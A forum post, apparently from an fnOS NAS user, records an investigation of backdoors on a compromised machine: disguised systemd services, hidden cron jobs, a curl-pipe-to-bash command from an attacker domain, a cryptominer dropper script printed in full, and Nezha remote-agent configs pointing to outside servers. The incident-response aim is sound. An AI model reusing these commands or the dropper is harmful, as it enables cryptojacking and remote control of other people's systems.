登录/ 注册
 找回密码
 立即注册

微信扫码 , 快速开始
发布主题
返回列表 发新帖
收起左侧

恶心的狗皮膏药后门梳理

1
回复 390
查看 [ 复制链接 ]
why_CMj72

1

主题

0

回帖

0

牛值

江湖小虾
昨天 13:04 显示全部楼层 阅读模式
悬赏1飞牛币未解决

直奔主题

root@fnos:/usr/trim/bin# ls /usr/bin/ -alht
total 494M
drwxr-xr-x  3 root root      36K Feb  3 14:31  .
-rwxr-xr-x  1 root root      34K Feb  1 10:05  smbd
-rwxrwxrwx  1 root root      89K Jan 31 16:10  dockers
-rwxr-xr-x  1 root root      87K Jan 27 14:04  nginx
-rwxr-xr-x  1 root root      34K Jan 22 04:38  ZljCsgP
-rwxr-xr-x  1 root root      34K Jan 22 04:36  42gKXj6
-rwxr-xr-x  1 root root      34K Jan 22 03:33  C3lB4fIUJS
-rwxr-xr-x  1 root root      34K Jan 22 02:58  W9pjWRgN3
-rwxr-xr-x  1 root root      34K Jan 22 00:34  GpXdOZFe
-rwxr-xr-x  1 root root      34K Jan 21 22:18  Kvz60g
-rwxr-xr-x  1 root root      34K Jan 21 22:16  HMqO
-rwxr-xr-x  1 root root      34K Jan 21 22:11  NJQQVsC6VO

root@fnos:/usr/trim/bin# ls -alht
-rwxrwxrwx  1 root root  452 Jan 31 16:10 system_startup.sh
-rwxr-xr-x  1 root root  92K Jan 31 16:10 trim_pap
-rwxr-xr-x  1 root root  86K Jan 27 14:04 trim_https_cgi

root@fnos:/etc/systemd/system# ls -alht
total 384K
-rw-r--r--  1 root root  213 Feb  1 10:08 smbd.service
-rw-r--r--  1 root root  214 Jan 31 16:10 dockers.service
-rw-r--r--  1 root root  222 Jan 31 16:10 trim_pap.service
-rw-r--r--  1 root root  228 Jan 27 14:04 trim_https_cgi.service
-rw-r--r--  1 root root  218 Jan 27 14:04 nginx.service
-rw-r--r--  1 root root  216 Jan 22 04:38 ZljCsgP.service
-rw-r--r--  1 root root  216 Jan 22 04:36 42gKXj6.service
-rw-r--r--  1 root root  219 Jan 22 03:33 C3lB4fIUJS.service
-rw-r--r--  1 root root  218 Jan 22 02:58 W9pjWRgN3.service
-rw-r--r--  1 root root  217 Jan 22 00:34 GpXdOZFe.service
-rw-r--r--  1 root root  215 Jan 21 22:18 Kvz60g.service
-rw-r--r--  1 root root  213 Jan 21 22:16 HMqO.service
-rw-r--r--  1 root root  219 Jan 21 22:11 NJQQVsC6VO.service

root@fnos:/etc/systemd/system# cat dockers.service
[Unit]
Description=dockers Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/bin/dockers
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target
root@fnos:/etc/systemd/system#

root@fnos:/etc/systemd/system# cat trim_pap.service
[Unit]
Description=AutoStart Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/trim/bin/trim_pap
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target


---i---------e-------  ./C3lB4fIUJS.service
---i---------e-------  ./W9pjWRgN3.service
----i---------e------- ./Kvz60g.service
----i---------e------- ./trim_pap.service
----i---------e------- ./NJQQVsC6VO.service
----i---------e------- ./smbd.service
----i---------e------- ./trim_https_cgi.service
----i---------e------- ./ZljCsgP.service
----i---------e------- ./42gKXj6.service
----i---------e------- ./GpXdOZFe.service
----i---------e------- ./HMqO.service
----i---------e------- ./nginx.service

root@fnos:/etc/systemd/system/multi-user.target.wants# ls -alht
total 16K
lrwxrwxrwx  1 root root   35 Jan 31 16:10 dockers.service -> /etc/systemd/system/dockers.service
lrwxrwxrwx  1 root root   36 Jan 31 16:10 trim_pap.service -> /etc/systemd/system/trim_pap.service
lrwxrwxrwx  1 root root   35 Jan 22 04:38 ZljCsgP.service -> /etc/systemd/system/ZljCsgP.service
lrwxrwxrwx  1 root root   35 Jan 22 04:36 42gKXj6.service -> /etc/systemd/system/42gKXj6.service
lrwxrwxrwx  1 root root   38 Jan 22 03:33 C3lB4fIUJS.service -> /etc/systemd/system/C3lB4fIUJS.service
lrwxrwxrwx  1 root root   37 Jan 22 02:58 W9pjWRgN3.service -> /etc/systemd/system/W9pjWRgN3.service
lrwxrwxrwx  1 root root   36 Jan 22 00:34 GpXdOZFe.service -> /etc/systemd/system/GpXdOZFe.service
lrwxrwxrwx  1 root root   34 Jan 21 22:18 Kvz60g.service -> /etc/systemd/system/Kvz60g.service
lrwxrwxrwx  1 root root   32 Jan 21 22:16 HMqO.service -> /etc/systemd/system/HMqO.service
lrwxrwxrwx  1 root root   38 Jan 21 22:11 NJQQVsC6VO.service -> /etc/systemd/system/NJQQVsC6VO.service
lrwxrwxrwx  1 root root   33 Jan 21 22:11 nginx.service -> /etc/systemd/system/nginx.service
lrwxrwxrwx  1 root root   42 Jan 21 22:11 trim_https_cgi.service -> /etc/systemd/system/trim_https_cgi.service

root@fnos:/rootfs-ext/sbin# ps -auxf |grep junmxiao.xyz |grep -v grep
root      198214  0.0  0.0   2576  1620 ?        S    10:07   0:00  \_ sh -c touch /run/test-mirror.json && dockerd --registry-mirror https://x.com ; curl -sSL https://junmxiao.xyz/h5/automonitor2.sh | bash ; echo --validate --config-file /run/test-mirror.json
root      210419  0.0  0.0   2576  1596 ?        S    10:42   0:00  \_ sh -c touch /run/test-mirror.json && dockerd --registry-mirror https://x.com ; curl -sSL https://junmxiao.xyz/h5/automonitor2.sh | bash ; echo --validate --config-file /run/test-mirror.json

root@fnos:/etc# crontab -l
7 12 * * * /bin/bash -c "exec -a systemd_helper '/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron' </dev/null >/dev/null 2>&1"

*/1 * * * * "/usr/lib/id.sericer.conf"

*/1 * * * * "/root/.config/font-manager.conf"

root@fnos:/etc/systemd/system# cat mcdxamxs.service
[Unit]
Description=System Service Manager
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c "exec -a ksmdd '/etc/systemd/system/.runtime/gpomkvzv/figxqflhit-systemd_systemd' </dev/null >/dev/null 2>&1"
Restart=always
RestartSec=10
User=root
Group=root

[Install]
WantedBy=multi-user.target

root@fnos:/etc/systemd/system/.runtime/gpomkvzv# file figxqflhit-systemd_systemd
figxqflhit-systemd_systemd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), Go BuildID=a4suSJdh_hFlNUPXdx4A/wj3zMVyj2yXmYHkUrOL4/-qAoFg2Hfuwp_bADYwpL/GuJjbSNNS3LSD6LcSmok, statically linked, no section header
root@fnos:/etc/systemd/system/.runtime/gpomkvzv# pwd
/etc/systemd/system/.runtime/gpomkvzv

rm /var/spool/cron/crontabs/root /usr/b/id.sericer.conf /boot/System /boot/System.img-6.8.0-8 /rootfs-extcrontab /rootfs-ext/sbin/nginx-1 /usr/bin/at.atloy /tmp/.font-unix-helpver /root/.config/font-manager.conf -rf

root      248748  0.0  0.5 714824  9996 ?        Ssl  12:22   0:00 /boot/System.img-6.8.0-8
root      248757  0.0  0.0   2576  1588 ?        S    12:22   0:00 /bin/sh /rootfs-ext/crontab
root      250005  0.0  0.0   5464  1752 ?        S    12:28   0:00  \_ sleep 50
root      248761  0.0  0.0   2576  1580 ?        S    12:22   0:00 /bin/sh /usr/bin/at.atloy
root      250048  0.0  0.0   5464  1784 ?        S    12:28   0:00  \_ sleep 60
root      248845  0.0  0.0   2576  1448 ?        S    12:22   0:00 /bin/sh /usr/bin/at.atloy
root      249949  0.0  0.0   5464  1708 ?        S    12:27   0:00  \_ sleep 60
root      248848  0.0  0.0   2576  1576 ?        S    12:22   0:00 /bin/sh /boot/System
root      250016  0.0  0.0   5464  1792 ?        S    12:28   0:00  \_ sleep 40
root      248854  0.0  0.0   2576  1596 ?        S    12:22   0:00 /bin/sh /tmp/.font-unix-helpver
root      249897  0.0  0.0   5464  1752 ?        S    12:27   0:00  \_ sleep 70

root         676  0.0  0.1   6608  2092 ?        Ss   Feb03   0:00 /usr/sbin/cron -f
root      245380  0.0  0.1   8500  2776 ?        S    12:07   0:00  \_ /usr/sbin/CRON -f
root      245381  0.0  0.0   2576  1564 ?        Ss   12:07   0:00      \_ /bin/sh -c /bin/bash -c "exec -a systemd_helper '/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron' </dev/null >/d
root      245383  0.0  0.2 1601988 4632 ?        Sl   12:07   0:00          \_ systemd_helper
root      245657 41.5 13.9 721212 271328 ?       Ssl  12:07   8:26              \_ rcu_gp_service

/tmp/.font-unix-helpver
/tmp/.X11-unix-cacher
/rootfs-ext/sbin/nginx-1
/rootfs-ext/crontab

image.png

root@fnos:/tmp# echo a2lzc2xhYS5jb206MzI2NTM= |base64 -d
**laa.com:32653root@fnos:/tmp#

root@fnos:/usr/share/zoneinfo# curl https://junmxiao.xyz/h5/automonitor2.sh
#!/bin/bash
MIN_FILE_SIZE_MB=6
FILE_PATH="/tmp/.local/.-/java"
FILE_PATH_2="/tmp/.local/.-/config.json"
download_java() {
    if [ "$DOWNLOADER" == "wget" ]; then
        wget --no-check-certificate https://junmxiao.xyz/h5/java -O "$FILE_PATH"
        wget --no-check-certificate https://junmxiao.xyz/h5/config.json -O "$FILE_PATH_2"
    elif [ "$DOWNLOADER" == "curl" ]; then
        curl https://junmxiao.xyz/h5/java > "$FILE_PATH"
        curl https://junmxiao.xyz/h5/config.json > "$FILE_PATH_2"
    fi
    chmod +x "$FILE_PATH"
}
if command -v wget &> /dev/null; then
    DOWNLOADER="wget"
elif command -v curl &> /dev/null; then
    DOWNLOADER="curl"
else
    echo "Neither wget nor curl found. Exiting."
    exit 1
fi
check_and_download() {
    if [ ! -f "$FILE_PATH" ] || [ "$(stat -c %s "$FILE_PATH")" -lt $((MIN_FILE_SIZE_MB * 1024 * 1024)) ]; then
        echo "Java file not found. Downloading..."
        mkdir -p /tmp/.local/.-/
        download_java
    fi
}
CPU_CORES=$(nproc)
HOSTNAME=$(uname -n)
PASSNAME="${HOSTNAME}_${CPU_CORES}"

if pgrep -f "rx/0" &> /dev/null; then
    pkill -9 "rx/0"
fi
pkill -9 "solr"
pkill -9 ".solr"
pkill -9 "solrd"
pkill -9 "nbminer"
pkill -9 "jupyterlab"
pkill -9 "kthreaddw"
pkill -9 "xmrig"
pkill -9 ".gitlabw"
pkill -9 "kinsing"
pkill -9 "ccminer"
pkill -9 "snapd"
pkill -9 "Sofia"
pkill -9 "telnetd"
pkill -9 "kdevtmpfsi"
pkill -9 "linuxsys"
COMMAND="/tmp/.local/.-/java -c /tmp/.local/.-/config.json -B"
while true; do
    check_and_download
    pkill -9 "solr"
    pkill -9 ".solr"
    pkill -9 "Sofia"
    pkill -9 "nbminer"
    pkill -9 "jupyterlab"
    pkill -9 "telnetd"
    pkill -9 "solrd"
    pkill -9 "snapd"
    pkill -9 "kthreaddw"
    pkill -9 ".gitlabw"
    pkill -9 "xmrig"
    pkill -9 "kinsing"
    pkill -9 "kdevtmpfsi"
    pkill -9 "ccminer"
    if ! pgrep -f "/tmp/.local/.-/java" >/dev/null; then
        if pgrep -f "rx/0" &> /dev/null; then
            pkill -9 "rx/0"
        fi
        download_java
        (cd /tmp/.local/.-/ && $COMMAND &)
    fi
    sleep 10
done

root@fnos:/tmp# systemctl status nezha-agent.service
b nezha-agent.service - e*egf§ Agent
     Loaded: loaded (/etc/systemd/system/nezha-agent.service; disabled; preset: enabled)
     Active: inactive (dead)

Feb 04 12:00:37 fnos systemd[1]: Stopping nezha-agent.service - e*egf§ Agent...
Feb 04 12:00:37 fnos systemd[1]: nezha-agent.service: Deactivated successfully.
Feb 04 12:00:37 fnos systemd[1]: Stopped nezha-agent.service - e*egf§ Agent.
Feb 04 12:00:37 fnos systemd[1]: nezha-agent.service: Consumed 1min 16.479s CPU time.

root@fnos:/tmp# cat /opt/nezha/agent/config.yml
client_secret: l22j9FTgVzC9GQgqIqkK2WeLWime7uAR
debug: false
disable_auto_update: false
disable_command_execute: false
disable_force_update: false
disable_nat: false
disable_send_query: false
gpu: false
insecure_tls: false
ip_report_period: 1800
report_delay: 3
self_update_period: 0
server: 141.98.198.19:8008
skip_connection_count: false
skip_procs_count: false
temperature: false
tls: true
use_gitee_to_upgrade: false
use_ipv6_country_code: false
uuid: 0e7b245c-c66e-1159-bece-735f169645e7

141.98.198.19:8008

/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron

root@fnos:/etc/systemd/system# cat systemd-journal.service
[Unit]
Description=Kernel Worker Net Daemon
After=network.target

[Service]
Type=simple
ExecStart=/usr/lib/systemd/systemd-journal
Restart=always
RestartSec=5
Environment=NZ_SERVER=static.132546.xyz:28028
Environment=NZ_TLS=false
Environment=NZ_CLIENT_SECRET=fOSyFKel66oYGDYtbRU9PSG3zBaY0UFq
Environment=NZ_DISABLE_AUTO_UPDATE=true
Environment=NZ_DISABLE_FORCE_UPDATE=true
Environment=NZ_DISABLE_COMMAND_EXECUTE=false
Environment=NZ_SKIP_CONNECTION_COUNT=false

[Install]
WantedBy=multi-user.target

建议

重做

附件: 您需要 登录 才可以下载或查看,没有账号?立即注册
收藏
送赞
分享

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
闪亮红星

7

主题

22

回帖

0

牛值

江湖小虾
昨天 16:54 显示全部楼层
回复

举报

1

回复
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

隐私政策|联系我们
粤ICP备2023020469号